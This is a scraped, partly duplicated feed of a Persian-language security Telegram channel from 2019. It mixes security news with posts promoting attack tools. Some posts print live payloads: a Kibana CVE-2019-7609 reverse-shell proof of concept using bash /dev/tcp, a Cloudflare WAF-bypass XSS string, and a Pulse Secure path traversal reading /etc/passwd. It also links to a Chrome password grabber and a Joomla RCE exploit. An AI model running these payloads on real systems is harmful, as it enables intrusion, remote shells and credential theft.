This media is not supported in your browser
VIEW IN TELEGRAM
sqlbuster
ابزار دامپ کردن دیتابیس های آسیب پذیر در برابر حملات UNION based
https://github.com/geek-repo/sqlbuster
#web
#pentest
#sqli
@sec_nerd
ابزار دامپ کردن دیتابیس های آسیب پذیر در برابر حملات UNION based
https://github.com/geek-repo/sqlbuster
#web
#pentest
#sqli
@sec_nerd
امنیت اطلاعات
کشف آسیب پذیری در Sudo آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند! تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل…
Don't panic! sudo flaw CVE-2019-14287 needs a specific config.
If a sudoers entry is written to allow the user to run a command
as any user except root, the bug can be used to avoid this restriction. Example:
myhost bob = (ALL, !root) /usr/bin/vi
https://www.openwall.com/lists/oss-security/2019/10/14/1
ترجمه:
هول نشید، آسیب پذیری سودو فقط تحت تنظیمات خاصی عمل میکنه.
اگر خط یا خطوطی در فایل sudoers وجود داشته باشه که به کاربری اجازه بده دستوری رو تحت هر دسترسی بجز root اجرا کنه، این محدودیت قابل دور زدن خواهد بود.
https://twitter.com/2xyo/status/1183839706586537985
#linux
#exploit
#privesc
@sec_nerd
If a sudoers entry is written to allow the user to run a command
as any user except root, the bug can be used to avoid this restriction. Example:
myhost bob = (ALL, !root) /usr/bin/vi
https://www.openwall.com/lists/oss-security/2019/10/14/1
ترجمه:
هول نشید، آسیب پذیری سودو فقط تحت تنظیمات خاصی عمل میکنه.
اگر خط یا خطوطی در فایل sudoers وجود داشته باشه که به کاربری اجازه بده دستوری رو تحت هر دسترسی بجز root اجرا کنه، این محدودیت قابل دور زدن خواهد بود.
https://twitter.com/2xyo/status/1183839706586537985
#linux
#exploit
#privesc
@sec_nerd
Twitter
2*yo
Don't panic! sudo flaw CVE-2019-14287 needs a specific config. If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction. Example: myhost bob = (ALL, !root) /usr/bin/vi https:/…
امنیت اطلاعات
کشف آسیب پذیری در Sudo آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند! تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل…
شرح کاملتری از آسیب پذیری کشف شده در sudo
https://sysdig.com/blog/detecting-cve-2019-14287/
#linux
#exploit
#sudo
@sec_nerd
https://sysdig.com/blog/detecting-cve-2019-14287/
#linux
#exploit
#sudo
@sec_nerd
Sysdig
How to detect CVE-2019-14287 using Falco | Sysdig
A recent flaw (CVE-2019-14287) has been found in sudo. Learn how to use Falco or Sysdig Secure to detect any exploit attempts against this vulnerability.
شرکت emsisoft برنامه رمزگشای باج افزار Puma را منتشر کرد
این باج افزار فایلهایی با پسوندهای puma و pumas یا pumax ایجاد میکند.
دریافت برنامه:
https://www.emsisoft.com/ransomware-decryption-tools/stop-puma
#ransome
#puma
#ransomware
@sec_nerd
این باج افزار فایلهایی با پسوندهای puma و pumas یا pumax ایجاد میکند.
دریافت برنامه:
https://www.emsisoft.com/ransomware-decryption-tools/stop-puma
#ransome
#puma
#ransomware
@sec_nerd
Emsisoft
STOP Puma decryptor
Free STOP Puma ransomware decryptor by Emsisoft. Unlock your files without paying the ransom.
بعد از فایلهای ویدئویی، اینبار هکرها موفق شدند پیلودهای آلوده خود را در فایلهای WAV جاگذاری کنند.
توضیحات کامل را اینجا بخوانید:
https://threatvector.cylance.com/en_us/home/malicious-payloads-hiding-beneath-the-wav.html
#wav
#backdoor
#rce
@sec_nerd
توضیحات کامل را اینجا بخوانید:
https://threatvector.cylance.com/en_us/home/malicious-payloads-hiding-beneath-the-wav.html
#wav
#backdoor
#rce
@sec_nerd
BlackBerry
Malicious Payloads - Hiding Beneath the WAV
BlackBerry Cylance Threat Researchers recently discovered obfuscated malicious code embedded within WAV audio files. Each WAV file was coupled with a loader component for decoding and executing malicious content secretly woven throughout the file’s audio…
فرارسیدن اربعین حسینی را به همه ی بزرگواران همراه تسلیت عرض میکنیم.
ما رو از دعای خیرتون محروم نفرمایید.
@sec_nerd
ما رو از دعای خیرتون محروم نفرمایید.
@sec_nerd
تو شرکتمون مسئول مصاحبه هستم
اول از همه دیدت این باشه که میتونی مفید باشی؟ هنری داری که بتونه نیاز دیگران رو برآورده کنه؟ میتونی سطح شرکت رو ارتقا بدی و چجوری میتونی موثر باشی؟
کسی که سوال اولش حقوق چقدر میدین باشه، حتی به مصاحبه دعوتش نمیکنم
دوستی که نمیشناسمت و این جملات زیبا رو گفتی، واقعا درست و دقیق بود.
#سخن_نیک
#motivation
@sec_nerd
اول از همه دیدت این باشه که میتونی مفید باشی؟ هنری داری که بتونه نیاز دیگران رو برآورده کنه؟ میتونی سطح شرکت رو ارتقا بدی و چجوری میتونی موثر باشی؟
کسی که سوال اولش حقوق چقدر میدین باشه، حتی به مصاحبه دعوتش نمیکنم
دوستی که نمیشناسمت و این جملات زیبا رو گفتی، واقعا درست و دقیق بود.
#سخن_نیک
#motivation
@sec_nerd
cloudflare «XSS» payload to bypass protection.
🦍
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
#BugBounty #BugBountyTip #WAF #infosec
@sec_nerd
🦍
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
#BugBounty #BugBountyTip #WAF #infosec
@sec_nerd
هکرهای روس زبان نسخه ی دستکاری شده ی مرورگر tor را تحت عنوان «نسخه اصلی روسی» به کاربران دادند و اقدام به سرقت بیت کوین از آنان کردند.
به گزارش ESET این کمپین کلاهبرداری برای سالها فعال بوده است.
آنان با استفاده از یک پیلود آلوده ی جاوا اسکریپت در سه مارکت بزرگ روسی در دارک نت اقدام به دزدی از کاربران میکرد.
توضیحات بیشتر:
https://www.darkreading.com/attacks-breaches/tor-weaponized-to-steal-bitcoin/d/d-id/1336127
#news
#tor
#malware
#darknet
#russia
@sec_nerd
به گزارش ESET این کمپین کلاهبرداری برای سالها فعال بوده است.
آنان با استفاده از یک پیلود آلوده ی جاوا اسکریپت در سه مارکت بزرگ روسی در دارک نت اقدام به دزدی از کاربران میکرد.
توضیحات بیشتر:
https://www.darkreading.com/attacks-breaches/tor-weaponized-to-steal-bitcoin/d/d-id/1336127
#news
#tor
#malware
#darknet
#russia
@sec_nerd
Dark Reading
Tor Weaponized to Steal Bitcoin
A years-long campaign targets users of Russian darknet markets with a modified install of a privacy-oriented browser.
سلام
یکی از معدود کانالهایی که مطالبش:
۱- به روز هست
۲- کپی نیست
۳- و مفید و کاربردی
هستن کانال https://t.iss.one/web_priv8 هست.
دنبال کنید و به دوستان خودتون هم معرفی کنید.
@web_priv8
@sec_nerd
یکی از معدود کانالهایی که مطالبش:
۱- به روز هست
۲- کپی نیست
۳- و مفید و کاربردی
هستن کانال https://t.iss.one/web_priv8 هست.
دنبال کنید و به دوستان خودتون هم معرفی کنید.
@web_priv8
@sec_nerd
Telegram
Web_Priv8
Sina Doosti @r00t98
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98
Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98
Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
دستورالعمل اجرایی بیت کوین در ایستگاه پایانی/برق ماینرها قطع شد
مصطفی رجبی مشهدی (سخنگوی صنعت برق) در گفتوگو با خبرنگار اقتصادی خبرگزاری فارس، در پاسخ به این سؤال که آیا با توجه به قانونی شدن استخراج رمز ارزها دستورالعمل این قانون تهیه شده است، گفت: وزارت صنعت، معدن و تجارت و وزارت نیرو در حال تهیه دستورالعمل اجرایی استخراج رمز ارزها هستند و این دستورالعمل در مراحل پایانی قرار داشته و به زودی نهایی میشود.
رجبی مشهدی با اشاره به اینکه بر اساس مصوبه دولت به دو شکل تأمین برق برای استخراج رمز ارزها باید صورت بگیرد، گفت: یکی از روشهای تأمین برق تولید بیت کوین این است که تعرفه برق برای ماینرها متوسط برق صادراتی باشد و روش دوم این است که استخراجکنندگان رمز ارزها میتوانند نیروگاه احداث کنند.
وی ادامه داد: متقاضیانی که نیروگاه احداث کنند برای آنها 70 درصد نرخ گاز صادراتی محاسبه میشود و افرادی که نیروگاه تجدیدپذیر احداث کنند نمیتوانند مستقل از شبکه برق باشند، پس باید تا زمان نهایی شدن دستورالعمل که در حال تدوین است منتظر ماند.
* با استفاده از برق ارزان برای ماینینگ برخورد می شود
سخنگوی صنعت برق در پاسخ به این سؤال که تعدادی از ماینرها به دلیل نارضایتی از بابت محاسبه متوسط برق صادراتی برای آنها در حال خروج از ایران هستند و آیا در این مدت مزارع تولید بیتکوین شناسایی شده است، گفت: هر مشترکی که بخواهد از برق ارزان برای تولید بیتکوین و استخراج رمز ارزها استفاده کند با آن برخورد خواهد شد.
وی ادامه داد: یک ماه قبل 150 مگاوات به دلیل همین استفاده از برق ارزان صورتجلسه شده و برق آنها قطع شد.
رجبی مشهدی با اشاره به اینکه عمدتاً این 150 مگاوات مربوط به استانهای شمالی کشور بوده است، گفت: به هر حال مصرف برق بعد از عبور پیک تابستان کاهش مییابد و نیروگاهها به تدریج برای تعمیرات نیروگاهی و آمادگی برای تولید برق در فصل تابستان آماده میشوند پس باید ماینرها به قانون احترام بگذارند و از برق ارزان به خصوص تعرفه برق کشاورزی خودداری کنند.
https://fna.ir/dcm6i8
#news
#btc
#iran
@sec_nerd
مصطفی رجبی مشهدی (سخنگوی صنعت برق) در گفتوگو با خبرنگار اقتصادی خبرگزاری فارس، در پاسخ به این سؤال که آیا با توجه به قانونی شدن استخراج رمز ارزها دستورالعمل این قانون تهیه شده است، گفت: وزارت صنعت، معدن و تجارت و وزارت نیرو در حال تهیه دستورالعمل اجرایی استخراج رمز ارزها هستند و این دستورالعمل در مراحل پایانی قرار داشته و به زودی نهایی میشود.
رجبی مشهدی با اشاره به اینکه بر اساس مصوبه دولت به دو شکل تأمین برق برای استخراج رمز ارزها باید صورت بگیرد، گفت: یکی از روشهای تأمین برق تولید بیت کوین این است که تعرفه برق برای ماینرها متوسط برق صادراتی باشد و روش دوم این است که استخراجکنندگان رمز ارزها میتوانند نیروگاه احداث کنند.
وی ادامه داد: متقاضیانی که نیروگاه احداث کنند برای آنها 70 درصد نرخ گاز صادراتی محاسبه میشود و افرادی که نیروگاه تجدیدپذیر احداث کنند نمیتوانند مستقل از شبکه برق باشند، پس باید تا زمان نهایی شدن دستورالعمل که در حال تدوین است منتظر ماند.
* با استفاده از برق ارزان برای ماینینگ برخورد می شود
سخنگوی صنعت برق در پاسخ به این سؤال که تعدادی از ماینرها به دلیل نارضایتی از بابت محاسبه متوسط برق صادراتی برای آنها در حال خروج از ایران هستند و آیا در این مدت مزارع تولید بیتکوین شناسایی شده است، گفت: هر مشترکی که بخواهد از برق ارزان برای تولید بیتکوین و استخراج رمز ارزها استفاده کند با آن برخورد خواهد شد.
وی ادامه داد: یک ماه قبل 150 مگاوات به دلیل همین استفاده از برق ارزان صورتجلسه شده و برق آنها قطع شد.
رجبی مشهدی با اشاره به اینکه عمدتاً این 150 مگاوات مربوط به استانهای شمالی کشور بوده است، گفت: به هر حال مصرف برق بعد از عبور پیک تابستان کاهش مییابد و نیروگاهها به تدریج برای تعمیرات نیروگاهی و آمادگی برای تولید برق در فصل تابستان آماده میشوند پس باید ماینرها به قانون احترام بگذارند و از برق ارزان به خصوص تعرفه برق کشاورزی خودداری کنند.
https://fna.ir/dcm6i8
#news
#btc
#iran
@sec_nerd
خبرگزاری فارس
دستورالعمل اجرایی استخراج بیتکوین در ایستگاه پایانی/ برق ماینرها قطع شد
سخنگوی صنعت برق با اشاره به اینکه در یک ماه گذشته 150 مگاوات برق ماینرها به دلیل استفاده از برق ارزان برای استخراج رمز ارزها قطع شده است، گفت: وزارت صنعت و نیرو در حال تهیه دستورالعمل اجرایی برای استفاده ماینرها از برق هستند.
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
بیش از 14500 سرور Pulse secure در برابر اکسپلویت CVE-2019-11510 آسیب پذیر هستند.
ده کشور اول در این خصوص در تصویر قابل مشاهده است.
نکته جالب، آسیب پذیر بودن سازمان های نظامی و دولتی و شرکت های بزرگ می باشد.
https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/
#pulse
#news
#usa
@sec_nerd
ده کشور اول در این خصوص در تصویر قابل مشاهده است.
نکته جالب، آسیب پذیر بودن سازمان های نظامی و دولتی و شرکت های بزرگ می باشد.
https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/
#pulse
#news
#usa
@sec_nerd
تشریح و اکسپلویت آسیب پذیری Race Condition در وب اپلیکیشن
https://memoryleaks.ir/race-condition-in-web-application/
#web
#RaceCondition
#RC
@sec_nerd
https://memoryleaks.ir/race-condition-in-web-application/
#web
#RaceCondition
#RC
@sec_nerd
مموریلیکس - نگاشتههایی پیرامون امنیت، شبکه و رمزنگاری
آسیبپذیری Race Condition
در این پست میخوایم آسیب پذیری Race Conditon رو تشریح کنیم،اول بگیم که این آسیب پذیری چیه و یه مثال در دنیای واقعی ازش بگیم،بعد بریم یک اسکریپت PHP از گیتهاب که آسیب پذیری Race Condition داره رو کلون و اکسپلویت کنیم.
اکسپلویت اجرای دستور از راه دور بر روی جوملا نسخه ی 3.4.6
https://www.exploit-db.com/exploits/47524
https://github.com/kiks7/rusty_joomla_rce
#joomla
#web
#rce
#pentest
@sec_nerd
https://www.exploit-db.com/exploits/47524
https://github.com/kiks7/rusty_joomla_rce
#joomla
#web
#rce
#pentest
@sec_nerd
Exploit Database
Joomla! 3.4.6 - Remote Code Execution
Joomla! 3.4.6 - Remote Code Execution.. webapps exploit for PHP platform
استخراج پسوردهای ذخیره شده در کروم بصورت clear text
https://github.com/x899/chrome_password_grabber
#chrome
#enum
@sec_nerd
https://github.com/x899/chrome_password_grabber
#chrome
#enum
@sec_nerd
GitHub
GitHub - priyankchheda/chrome_password_grabber: Get unencrypted 'Saved Password' from Google Chrome
Get unencrypted 'Saved Password' from Google Chrome - priyankchheda/chrome_password_grabber
POC: kibana < 6.6.0
.es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')__
https://slides.com/securitymb/prototype-pollution-in-kibana/#/58
#kibana
#elasticsearch
#nosql
#rce
@sec_nerd
.es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')__
https://slides.com/securitymb/prototype-pollution-in-kibana/#/58
#kibana
#elasticsearch
#nosql
#rce
@sec_nerd
Slides
Prototype Pollution in Kibana
Presentation I did for OWASP Poland Day, 14th October 2019
امنیت اطلاعات
POC: kibana < 6.6.0 .es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')__ https://slides.com/securitymb/prototype…
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2019-7609
.es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')__
#kibana
#elasticsearch
#nosql
#rce
@sec_nerd
.es(*).props(label.__proto.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')__
#kibana
#elasticsearch
#nosql
#rce
@sec_nerd
امنیت اطلاعات
دیتابیس سایت امریکایی equifax برای فروش در دارکنت قرار داده شده! قیمت : 600 بیت کوین! #news #breach #equifax
طبق شکایتی که از سوی سهامداران شرکت equifax تنظیم شده است مشخص شد این شرکت از نام کاربری و پسورد admin:admin برای دسترسی به پنل مدیریت پورتال حساسی استفاده میکرده است که این ضعف به هکرها کمک کرده است ضمن نفوذ به سرور و سرقت داده های کاربران، کلیدهای رمزگشایی پسوردهای رمزنگاری شده را نیز بدست آورند.
https://finance.yahoo.com/news/equifax-password-username-admin-lawsuit-201118316.html
#news
#equifax
#usa
#breach
@sec_nerd
https://finance.yahoo.com/news/equifax-password-username-admin-lawsuit-201118316.html
#news
#equifax
#usa
#breach
@sec_nerd
Yahoo Finance
Equifax used 'admin' as username and password for sensitive data: lawsuit
A class action lawsuit filed in January 2019 claims Equifax used "admin" as both password and username for a portal with sensitive information.